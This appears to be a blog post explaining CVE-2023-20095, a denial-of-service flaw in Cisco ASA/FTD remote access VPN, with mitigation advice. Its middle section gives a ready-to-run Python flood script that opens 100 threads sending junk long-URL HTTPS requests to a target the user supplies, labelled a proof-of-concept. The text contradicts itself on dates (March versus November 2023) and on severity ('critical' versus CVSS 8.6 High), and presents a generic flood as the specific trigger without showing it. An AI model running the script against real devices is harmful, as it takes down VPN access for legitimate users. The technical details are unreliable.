CVE-2023-20095 - Inside the Cisco ASA and FTD Remote VPN DoS Vulnerability

In March 2023, Cisco disclosed a critical vulnerability—CVE-2023-20095—affecting its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. This bug allows unauthenticated remote attackers to cause a denial-of-service (DoS) on affected appliances using carefully crafted HTTPS requests. In this deep dive, we’ll explain how the vulnerability works, review Cisco advisories, and show real-world exploit details, all in simple, approachable language.

Let’s break it down

- Impacted products: Cisco ASA and Cisco FTD (Firepower Threat Defense) software, when configured for remote access VPN using the HTTPS web interface.

Attack surface: Anyone can exploit this over the internet—no login needed!

- Danger: Denial-of-service (DoS)—the device stops responding, blocking legitimate remote access users.

Official Cisco Advisory:
Cisco ASA/FTD Remote Access VPN DoS Vulnerability

How Attackers Exploit It

Attackers abuse the way the ASA/FTD software handles certain malformed HTTPS requests. When the firewall tries to process these "bad" requests, it consumes excessive system resources. Eventually, the device may crash, reboot, or just drop legitimate traffic—causing a denial-of-service for all users relying on VPN or firewall protection.

The key issue: Improper HTTPS request parsing leads to resource exhaustion.

In short:
Send enough weird HTTPS requests, and the system runs out of resources. No authentication or valid credentials are needed.

Proof of Concept (PoC) Exploit

*Note: This code is for educational and defensive purposes only.*

Here’s a basic Python script that repeatedly sends malformed HTTPS requests to the VPN gateway

import requests
import threading

# Edit this with your target Cisco ASA/FTD device IP or hostname
TARGET = "https://<asa-ftd-ip-address>";

# Malformed HTTPS request (unknown/invalid URL and headers)
def send_junk():
    try:
        # We are sending bad paths, which are not expected by the web VPN
        path = "/%s" % ("A" * 2048)
        requests.get(TARGET + path, verify=False, timeout=2)
    except Exception as e:
        pass  # Device may reset the connection

# Launch lots of threads to simulate attack
for i in range(100):
    threading.Thread(target=send_junk).start()

What does this do?

- Spams the ASA/FTD with super long, unexpected URLs via HTTPS

High frequency = high stress on the device

*With enough requests, the device slows down, stops processing legitimate VPN sessions, and may even reboot.*

CVSS Score: 8.6 (High)

Root Cause:
The ASA/FTD HTTPS service doesn't properly check or limit resource allocation for bad/abnormal HTTP requests from unauthenticated users. Attackers can exploit this logic flaw to hog CPU and memory.

Check Your Version:

- Affected versions are listed in the official advisory.

Cisco released patches for both ASA and FTD software.

- Get the updates from Cisco's website

Restrict HTTPS access with ACLs (only allow trusted IPs)

- Enable logging/monitoring for abnormal HTTPS spikes

References

- Cisco Advisory: CVE-2023-20095 - ASA/FTD Remote Access VPN DoS
- NIST NVD: CVE-2023-20095 Details
- Cisco Security Blog: Cisco Product Security Incident Response Team (PSIRT)

Conclusion

CVE-2023-20095 is a wake-up call for anyone running Cisco ASA or FTD as a VPN gateway. Simple, unauthenticated HTTPS requests from anywhere on the internet can take your firewall offline. The lesson? Stay on top of patching, limit remote access where possible, and always monitor for unusual traffic patterns.

Timeline

Published on: 11/01/2023 18:15:09 UTC
Last modified on: 01/25/2024 17:15:29 UTC